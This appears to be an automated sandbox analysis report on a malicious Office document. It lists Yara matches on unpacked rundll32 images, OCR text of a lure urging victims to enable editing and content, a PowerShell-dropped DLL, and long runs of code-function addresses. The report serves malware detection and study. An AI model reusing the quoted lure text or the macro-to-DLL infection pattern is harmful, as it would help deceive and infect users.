Source: Yara match | File source: 12.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.7b0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.770000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.b10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.7b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.750000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.990000.1.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4 | Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 8,758 N@m 13 ;a 1009
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Kaktksw\An6othh\N49I.dll
Very long command line found
Source: unknown | Process created: Commandline size = 5677
Source: unknown | Process created: Commandline size = 5576
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 5576
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00771328 NtSetInformationKey,
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\SysWOW64\Xsugi\
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00257D7D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002589F6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025C424
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024DC2F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00242628
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00244A2B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00247E34
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00258831
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024903F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024A83A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00247605
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024620A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00248816
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025F411
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024F813
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024D013
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024421E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00258668
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024C07D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024D44C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025C04C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00254E4B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024704B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00245856
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00241658
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00251259
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025CAA0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00244EA1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00248CA3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025C6AD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002456B3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00255AB8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00245EB9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00254693
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00249AE1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002542E2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002494EC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024C6EF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025DEE8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002506C2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00249CC8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025D2CB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024D0DE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025BF25
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025DB25
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024492A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025D530
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024213E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00255115
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024CF11
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025231B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00258F65
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00252965
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00250F6D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025676B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024A176
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00251B71
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00257570
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00253D7C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025DD78
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00256B45
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024CB42
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025654F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00243D4E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002599A4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00255DAA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025EDB9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025E19F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00245BE1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00242DEE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002537F4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025B3FE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00246BC0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002573C0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002577C0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00259DC0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025CDCC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024ADCE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002593C9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025B1D2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00244BDE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0027303C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00281E14
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00523856
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00519055
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0052C014
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0052C83F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0052502C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_005210E5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0052D099
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0052188F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0051C0B6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_005210BB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_005260B9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00514152
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00515155
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0052A972
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00516134
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00526934
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0052893D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0051C9C0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0052B998
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0052E985
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0051D1A3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00518A60
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00518217
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0051923C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00525AC3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_005132C2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_005232F0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_005272F1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00526AE4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0052D2EC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0052C340
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00516B79
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00512362
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0052531E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0052E32D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00527BDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00510BCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00511B9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005243BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005173A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052D45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051BC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00523C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052BC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00514C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005284D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00525CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005204E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052B499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051C485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00526D34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052B5C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00514DCA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051B5F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051ED87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051C587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00517D8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005185B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005165BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00527DA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00519DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00519DAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051C652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00521ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00513E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00524689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005116B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052A746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00527F6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052D713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00528F18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00513F9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023DC2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023903F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023620A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00239CC8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023492A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023A176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00243D7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00247D7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024654F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002437F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002489F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024B3FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002493C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024C424
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00234A2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00232628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00248831
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00237E34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023A83A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00237605
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023F813
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023D013
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00238816
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024F411
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023421E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00248668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023C07D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023704B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024C04C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023D44C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00244E4B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00235856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00231658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00241259
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00238CA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00234EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024CAA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024C6AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002356B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00235EB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00245AB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00244693
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00239AE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002442E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023C6EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024DEE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002394EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002406C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024D2CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023D0DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024BF25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024DB25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024D530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023213E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00245115
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023CF11
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024231B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00248F65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00242965
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00240F6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024676B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00247570
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00241B71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024DD78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023CB42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00246B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00233D4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002499A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00245DAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024EDB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024E19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00235BE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00232DEE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00236BC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002473C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002477C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00249DC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024CDCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023ADCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024B1D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00234BDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00271E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EC83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EC014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E3856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D9055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E10BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DC0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002ED099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E10E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E893D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D6134
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E6934
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EA972
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D5155
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D4152
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DD1A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EE985
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EB998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DC9C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D8217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D8A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002ED2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E6AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E32F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E72F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E5AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D32C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EE32D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E531E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D2362
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D6B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EC340
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D73A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E43BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D1B9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D0BCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E7BDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D4C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EBC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E3C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DBC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002ED45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DC485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EB499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E04E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E5CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E84D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E6D34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D9DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D9DAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E7DA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D65BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D85B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D7D8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DED87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DC587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DB5F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D4DCA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EB5C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DC652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D16B2
